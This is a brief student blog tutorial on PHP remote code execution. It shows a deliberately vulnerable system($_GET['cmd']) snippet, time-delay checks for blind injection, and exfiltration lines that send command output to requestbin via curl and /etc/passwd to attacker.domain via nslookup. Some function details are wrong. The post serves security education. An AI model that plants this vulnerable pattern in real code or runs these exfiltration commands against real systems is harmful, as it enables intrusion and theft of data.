Pwning PHP: Remote Code Execution

Mudhalai Mr
Apr 18 · 2 min read

RCE allows an attacker to execute code on a vulnerable machine and the CVSS severity level of RCE is critical (well what more do you need than that?)

Image Credits: Google

Note: Check out this blog for more PHP Pwning and to learn why PHP is targeted.

System:

Similar to the system() function in C, system() in PHP executes all the input as shell commands in the machine. If the user inputs are passed into it, this will lead to Code Execution.

<?php
$cmd = $_GET[‘cmd’];
system($cmd); ?>

http://www.example.com/?cmd=command

PHP documentation warns developers not you use it without an input sanitization function.

Other similar code execution functions:

exec(): Execute an external program
pass(): Returns raw output

When the output is not returned it becomes a blind RCE but, how can we verify the bug? We can verify by using time delays,

ping -c 10 192.168.0.2 delays by 10 secs

ping -c -20 192.168.0.2 delays by 20 secs

If we have to read the output of the command we can redirect it to a file and expose the file to read it,

uname -i > /var/www/html/info.txt

Similarly, symbols like “&”(for appending commands), “|”(for piping out of one command to another command as input).

We can read the output by returning it through different protocols,

curl http://requestbin.net/your-server?output=`cat flag.txt`

nslookup `cat /etc/passwd`.attacker.domain

RCE has a lot more variants than I covered, try to explore them as they are worth spending time on. For example, there are lots of techniques to bypass Web Application Firewalls and other sanitization programs. And there is a crazy method to cover up RCE inside DNS queries, here are some resources to keep your quest going:

https://owasp.org/www-community/attacks/Code_Injection
https://blog.qualys.com/product-tech/2019/10/30/php-remote-code-execution-vulnerability-cve-2019-11043
https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41

Developer Student Clubs SASTRA

DSC SASTRA Deemed To Be University is one of the Google…

Developer Student Clubs SASTRA

DSC SASTRA Deemed To Be University is one of the Google Developers Community chapter for college students. We help students bridge the gap between theory and practice and grow their knowledge by providing a peer-to-peer learning environment, by conducting workshops, study jams.

Mudhalai Mr

Written by

<>AKA Gowtham Student at SASTRA Deemed university, Core team member DSC SASTRA </>

Developer Student Clubs SASTRA

DSC SASTRA Deemed To Be University is one of the Google Developers Community chapter for college students. We help students bridge the gap between theory and practice and grow their knowledge by providing a peer-to-peer learning environment, by conducting workshops, study jams.

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store